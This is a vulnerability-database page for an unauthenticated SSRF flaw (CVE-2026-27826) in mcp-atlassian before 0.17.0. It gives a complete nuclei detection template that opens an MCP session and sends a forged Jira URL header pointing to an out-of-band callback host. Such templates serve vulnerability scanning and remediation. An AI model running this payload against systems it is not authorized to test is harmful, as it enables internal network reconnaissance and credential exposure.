Lucene search
K

mcp-atlassian < 0.17.0 - Server-Side Request Forgery

🗓️ 09 Jul 2026 03:01:09Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

Unauthenticated SSRF in mcp-atlassian before 0.17.0 due to header validation.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-27826
10 Mar 202618:46
attackerkb
ATTACKERKB
CVE-2026-27825
10 Mar 202618:53
attackerkb
Circl
CVE-2026-27825
24 Feb 202611:57
circl
Circl
CVE-2026-27826
24 Feb 202611:57
circl
CNNVD
MCP Atlassian 安全漏洞
10 Mar 202600:00
cnnvd
CNNVD
MCP Atlassian 代码问题漏洞
10 Mar 202600:00
cnnvd
CVE
CVE-2026-27825
10 Mar 202618:53
cve
CVE
CVE-2026-27826
10 Mar 202618:46
cve
Cvelist
CVE-2026-27825 MCP Atlassian has an arbitrary file write leading to arbitrary code execution via unconstrained download_path in confluence_download_attachment
10 Mar 202618:53
cvelist
Cvelist
CVE-2026-27826 MCP Atlassian has SSRF via unvalidated X-Atlassian-Jira-Url / X-Atlassian-Confluence-Url headers
10 Mar 202618:46
cvelist
Rows per page
id: CVE-2026-27826

info:
  name: mcp-atlassian < 0.17.0 - Server-Side Request Forgery
  author: eyangfeng88-arch
  severity: high
  description: |
   MCP Atlassian < 0.17.0 contains a server-side request forgery caused by improper validation of custom HTTP headers in the HTTP middleware, letting unauthenticated attackers force outbound requests to arbitrary URLs, exploit requires access to the mcp-atlassian HTTP endpoint.
  impact: |
   Unauthenticated attackers can make the server send requests to arbitrary URLs, enabling internal network reconnaissance and potential credential theft.
  remediation: |
   Upgrade to version 0.17.0 or later.
  reference:
    - https://pluto.security/blog/mcpwnfluence-cve-2026-27825-critical/
    - https://github.com/sooperset/mcp-atlassian/security/advisories/GHSA-7r34-79r5-rcc9
    - https://github.com/sooperset/mcp-atlassian/pull/986
    - https://nvd.nist.gov/vuln/detail/CVE-2026-27826
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
    cvss-score: 8.2
    cve-id: CVE-2026-27826
    epss-score: 0.14958
    epss-percentile: 0.96308
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 2
    vendor: sooperset
    product: mcp-atlassian
    shodan-query: http.html:"Atlassian MCP"
    fofa-query: body="Atlassian MCP" || header="mcp-session-id"
  tags: cve,cve2026,mcp,atlassian,ssrf,oast

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /mcp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept: application/json, text/event-stream

        {"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2024-11-05","capabilities":{},"clientInfo":{"name":"nuclei","version":"1.0"}}}

    extractors:
      - type: regex
        name: session_id
        part: header
        internal: true
        group: 1
        regex:
          - '(?i)Mcp-Session-Id:\s*([a-f0-9]+)'

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'len(session_id) > 0'
        condition: and
        internal: true

  - raw:
      - |
        POST /mcp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept: application/json, text/event-stream
        Mcp-Session-Id: {{session_id}}
        X-Atlassian-Jira-Url: http://{{interactsh-url}}
        X-Atlassian-Jira-Personal-Token: nuclei-ssrf-test

        {"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"jira_get_issue","arguments":{"issue_key":"TEST-1"}}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "http")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502207130cad296d2fdf04c9ffc143da7935f983691c2030509099138f2991c36ba75022100bf24765ca1801a7d8137a79cf4d283bc89a3bd726204daf91d97f5c51e68ce0a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Apr 2026 15:14Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.18.2 - 9
EPSS0.14958
SSVC
10